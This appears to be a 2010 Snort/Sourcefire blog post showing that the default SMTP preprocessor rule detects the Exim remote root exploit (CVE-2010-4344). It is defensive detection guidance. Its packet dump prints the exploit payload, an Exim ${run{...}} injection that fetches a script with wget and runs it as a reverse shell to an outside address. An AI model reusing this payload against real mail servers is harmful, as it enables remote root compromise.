Tuesday, December 14, 2010

Exim Remote Root

We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root (CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:

# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472  [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:35781 -> 10.1.11.111:25
Stream reassembled packet
12/14-09:15:37.145472 00:0D:57:C7:22:C7 -> A4:BA:DC:19:DD:5F type:0x800 len:0xB92
10.1.11.11:35781 -> 10.1.11.111:25 TCP TTL:64 TOS:0x0 ID:47277 IpLen:20 DgmLen:2948 DF
***A**** Seq: 0xAFFD7BE6  Ack: 0x16168E70  Win: 0x7140  TcpLen: 32
20 2F 74 6D 70 2F 63 2E 70 6C 20 31 30 2E 31 2E   /tmp/c.pl 10.1.
31 31 2E 31 31 20 34 34 34 34 3B 27 7D 7D 20 24  11.11 4444;'}} $
7B 72 75 6E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20  {run{/bin/sh -c
27 77 67 65 74 20 68 74 74 70 3A 2F 2F 77 77 77  'wget http://www
2E 65 78 61 6D 70 6C 65 2E 63 6F 6D 2F 73 68 65  .example.com/she
6C 6C 2E 74 78 74 20 2D 4F 20 2F 74 6D 70 2F 63  ll.txt -O /tmp/c
2E 70 6C 3B 70 65 72 6C 20 2F 74 6D 70 2F 63 2E  .pl;perl /tmp/c.
70 6C 20 31 30 2E 31 2E 31 31 2E 31 31 20 34 34  pl 10.1.11.11 44
34 34 3B 27 7D 7D 20 24 7B 72 75 6E 7B 2F 62 69  44;'}} ${run{/bi
...
No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the max_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).
Add to Technorati Favorites Digg! This
Post a Comment